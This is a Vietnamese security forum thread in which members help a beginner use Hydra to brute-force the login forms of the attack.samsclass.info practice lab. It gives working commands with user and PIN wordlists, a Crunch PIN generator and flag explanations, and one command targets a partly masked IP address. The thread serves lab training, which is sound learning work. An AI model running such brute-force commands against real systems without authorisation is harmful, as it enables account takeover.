Brute force với HYDRA

hoangnghiaac

Wh------
06/02/2017
0
47 bài viết
Brute force với HYDRA
Em mới tập tành Hydra, em kiếm thì được web này https://attack.samsclass.info/brute.htm , làm theo video hướng dẫn https://www.youtube.com/watch?v=ZVngjGp-oZo mà mãi không được(em chạy Hydra trên nền windows nha), có tiền bối nào rành giúp em với ạ, em cảm ơn nhiều.
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
hoangnghiaac;n62640 đã viết:
Em mới tập tành Hydra, em kiếm thì được web này https://attack.samsclass.info/brute.htm , làm theo video hướng dẫn https://www.youtube.com/watch?v=ZVngjGp-oZo mà mãi không được(em chạy Hydra trên nền windows nha), có tiền bối nào rành giúp em với ạ, em cảm ơn nhiều.
Video em xem họ làm trên MacOS còn bản window thế nào anh cũng không dùng bao giờ vì mã nguồn thằng Hydra này bản chất được viết để chạy trên nên linux dạng command line nên chạy trên Win sẽ rất nhiều lỗi. Tốt nhất bạn nên cai kali linux rùi thực hành trên đó, Hydra tích hợp sẵn trên Kali rùi.
Các bước cơ bản để thực hiện theo cách của họ là chuẩn bị file password cho quá trình Brute force sau đó tìm form login rùi chạy lệnh để bắt đầu quá trình Brute force. Các bước rất rõ ràng bạn đang vướng chỗ nào.
Mã:
[B]hydra -L uName.txt -P uPass.txt attack.samsclass.info http-get-form "/brute4.php:login=^USER^&pin=^PASS^:Denied"[/B]
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment



Đối với giao diện như trên bạn có thể dùng câu lệnh

Mã:
Hydra -s 8080 -l admin -p wordlist.txt -e ns -f -V 46.xxx.xxx.80 http-get
Chú thích các trường:
s: port
l : tên đăng nhập
p: từ điển mật khẩu
e ns: để trống mật khẩu
f: khi tìm ra mật khẩu thì dừng
V: hiển thị các kết quả đã kiểm thử
http-get: form đăng nhập Capture1123.JPG
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
DiepNV88;n62653 đã viết:
Video em xem họ làm trên MacOS còn bản window thế nào anh cũng không dùng bao giờ vì mã nguồn thằng Hydra này bản chất được viết để chạy trên nên linux dạng command line nên chạy trên Win sẽ rất nhiều lỗi. Tốt nhất bạn nên cai kali linux rùi thực hành trên đó, Hydra tích hợp sẵn trên Kali rùi.
Các bước cơ bản để thực hiện theo cách của họ là chuẩn bị file password cho quá trình Brute force sau đó tìm form login rùi chạy lệnh để bắt đầu quá trình Brute force. Các bước [Hide] rất rõ ràng bạn đang vướng chỗ nào.
Mã:
[B]hydra -L uName.txt -P uPass.txt attack.samsclass.info http-get-form "/brute4.php:login=^USER^&pin=^PASS^:Denied"[/B]
[/Hide]

Em k biết cách đăng ảnh nên em nói chay mấy anh ráng đọc giùm em.
Pass là 3 chữ số nên em vào Crunch, gõ: Crunch 3 3 0123456789 >D:
ghia hc-hydra-windows-master/pass.txt
Em tạo 1 file user.txt trong Hydra gồm root,admin,administrator
Khởi động hydra em gõ :
hydra -L user.txt -P pass.txt attack.samsclass.info http-get-form "/brute4.php:login=^USER^&pin=^PASS^: Denied" Em đã làm sai ở đâu ạ??
(Vẫn k tìm ra pass và user)
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
hoangnghiaac;n62640 đã viết:
Em mới tập tành Hydra, em kiếm thì được web này https://attack.samsclass.info/brute.htm , làm theo video hướng dẫn https://www.youtube.com/watch?v=ZVngjGp-oZo mà mãi không được(em chạy Hydra trên nền windows nha), có tiền bối nào rành giúp em với ạ, em cảm ơn nhiều.[/Hide]

Bài đầu tiên https://attack.samsclass.info/basic0/
Hướng dẫn tại trang của bạn đã cũ, và trang đó bây giờ đã sử dụng thêm https nên Hydra sẽ cảnh báo,
fetch




Vì vậy, bạn phải dùng option -S khi bruteforce cho cổng 443
1489939954999.JPG


Vì vậy bạn sẽ dùng câu lệnh
Mã:
hydra -s 443 -l root -P wordlist.txt -S -V  attack.samsclass.info http-get /basic0/
999.JPG

998.JPG

999.JPG

998.JPG

998.JPG

999.JPG

998.JPG

999.JPG

998.JPG

998.JPG
 
Chỉnh sửa lần cuối bởi người điều hành:
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Em cảm ơn ạ, nhưng thí dụ muốn brute force trang em gửi thì sao? Anh có thử được chưa?
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
hoangnghiaac;n62734 đã viết:
Em cảm ơn ạ, nhưng thí dụ muốn brute force trang em gửi thì sao? Anh có thử được chưa?

Trang bạn gửi là trang nào nhỉ? Bạn để link cho mình với
Mình có lấy ví dụ bài basic0 của trang https://attack.samsclass.info/brute.htm bên trên
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Sugi_b3o;n62711 đã viết:
Bài đầu tiên https://attack.samsclass.info/basic0/
Hướng dẫn tại trang của bạn đã cũ, và trang đó bây giờ đã sử dụng thêm https nên Hydra sẽ cảnh báo,
fetch




Vì vậy, bạn phải dùng option -S khi bruteforce cho cổng 443
1489939954999.JPG


Vì vậy bạn sẽ dùng câu lệnh
Mã:
hydra -s 443 -l root -P wordlist.txt -S -V attack.samsclass.info http-get /basic0/

à mà cho em hỏi, sao anh biết là cổng 443 vậy ạ?
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
hoangnghiaac;n62781 đã viết:
brute force chính trang https://attack.samsclass.info/brute.htm luôn anh[/Hide]

Giao diện form và source cần bruteforce
1489939954996.JPG



Source:
PHP:
[B]LOGIN: [/B]
     
[B]PIN: [/B]
     
Sign in
​​​​​​​

Dùng lệnh:
Mã:
hydra -L 3names.txt -P 3digit -V -f  attack.samsclass.info https-get-form "/brute4.php:login=^USER^&pin=^PASS^:Denied"
1489939954997.JPG




Chú thích:
​​​​​​​
-L: đọc file chứa user
-P: đọc file chứa password (ở đây cụ thể là file chạy từ 001-999)
-V: hiển thị kết quả đã thử
-f : dừng brutefore khi đã tìm được kết quả đúng
https-get-form : form cần bruteforce

Mình dùng https-get-form không cần dùng -S dùng cho ssl và -s port 997.JPG

996.JPG

997.JPG

996.JPG
 
Chỉnh sửa lần cuối bởi người điều hành:
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
hoangnghiaac;n62786 đã viết:
à mà cho em hỏi, sao anh biết là cổng 443 vậy ạ?[/Hide]

Mình biết đó là cổng 443 bởi vì ......
1489939954994.JPG



994.JPG

994.JPG
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Bên trên